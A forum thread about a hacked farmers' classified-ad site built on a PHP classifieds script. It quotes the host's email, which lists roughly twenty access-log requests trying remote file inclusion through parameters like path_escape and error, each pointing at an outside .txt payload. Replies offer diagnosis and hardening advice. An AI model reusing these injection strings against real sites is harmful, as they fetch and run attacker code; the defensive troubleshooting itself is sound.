You are not logged in. Please login or register.
Robots for Robots → General Hardware / Software Discussion → PHP guns for hire?
Hey, I have a website that I need some help with. Are there any robots with PHP and other programming skills?
I can pay.
Do you have more specifics about the site and what you are trying to do with it?
Well, I have a classified ad site for farmers ( I am a farmer) - nothing fancy just a simple site. It has been hacked however, and the hosting company have suspended it for sending out spam.
I need someone to look throught the logs and script and find the problem. If anyone has got the skills to tackle this please let me know.
I can provide the logs and access to control panel in PM to whoever can help.
Here is what the hosting company have said
"It looks like you have some php
files that are vulnerable to cross-site scripting or remote file inclusion
exploits, but we haven't been able to find the definite exact cause or file."
Remember that I will pay whoever can help.
serious stuff, robototitico... Who made the PHP site on the first run? is it some sort of FOSS/commercial package or
made by someone in particular?
The script is xzero classifeds script - www.xzeroscripts.com
Someone on getafreelancer.com purchased and installed it for me.
it sounds like you need to log into your ftp so you can get to the files and secure some of them. it varies from product to product, but usually you have to set permissions once the site is set up so certain files can't be hacked.
on my ftp program (fetch) you just click the file and click "get info" and it will list permissions for the files. there are 3 sets: Owner, Group, Others and each one has 3 check boxes: Read, Write, Execute.
Once you figure out which files to secure, you want to only make the Owner have all three check boxes checked and the others set to Read. It should have a number associated with it like 644 or 744 or something.
I'm pretty sure that will take care of the problem. I imagine the forum on www.xzeroscripts.com has someone who has run into this as well.
That didnt fix it. The people I've talked to on www.xzeroscripts.com dont want to touch this with a barge pole either.
Heres what hosting company said:
Hi Philip
We've had to suspend that account again. It looks like you have some php files that are vulnerable to cross-site scripting or remote file inclusion exploits, but we haven't been able to find the definite exact cause or file.
Because your site to attempting to flood our mail server with connections, we'll have to keep the site suspended 'till the issue is found.
Maybe the person who installed the site might be able where the following log entries are been called from:
/?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/5/posts/2_Community/0/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg%20/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/index.php?news_id=3&start=0&category...t_id=0&arcyear=&arcmonth=//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/index.php?news_id=3&start=0&category...t_id=0&arcyear=&arcmonth=/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???If you could ask them what php files are called, when any of the above URL's are entered, it might help us track down the problem.
Regards
Jason
what those guys said to you that they don't want to touch it with a pole??? I mean, they made it...
Well, I put a message on the forum. And two guys offered to help. One said that the job is too messy and he's not willing to help. The other guy is still deciding.
In general, I'd give the following advice: "hacked" is a very broad term, this can be anything... Could be a bug in the installation, in the software itself, insecure passwords, whatever... If it's a bug in the software, can be SQL injection, file upload vulnerability, remote file inclusion, XSS, just to name a few. The safest bet in general is to have someone knowledgeable have a close look at your particular situation and figure out the attack vector. No offense to screenvinylimage - but I think that advice goes a bit too short. Just fiddling around with the permissions, without knowing what's going on, and expecting that things will be magically "fixed" is a rather naive approach. Chances are higher that you'll fuck up your setup for good, rather than fixing the hole in the system.
In this case, however, I bet the scenario is the following: the scripts you're using have a security hole that allow for a remote file inclusion exploit. In particular, certain GET variables such as path_escape are not properly sanitized. This looks like the original authors are to blame, and your particular install is sane. But no guarantees, the data you've provided is very sparse. I'm sorry I don't have the resources to delve into this case any further.
No offense to screenvinylimage - but I think that advice goes a bit too short. Just fiddling around with the permissions, without knowing what's going on, and expecting that things will be magically "fixed" is a rather naive approach. Chances are higher that you'll fuck up your setup for good, rather than fixing the hole in the system.
i should have clarified that typically CMS installs will tell you which files to secure once you have installed the system on your server. it isn't just random fiddling.
maurits is right, it could be more complex than just a permissions error, i just usually find permissions settings as a good starting point. you could also do some google searching and see if others had the same hack problem you had and what the solution was to fix the problem.
Robots for Robots → General Hardware / Software Discussion → PHP guns for hire?
Powered by PunBB, supported by Informer Technologies, Inc.
Currently used extensions: pun_approval, pun_admin_add_user. Copyright © 2009 PunBB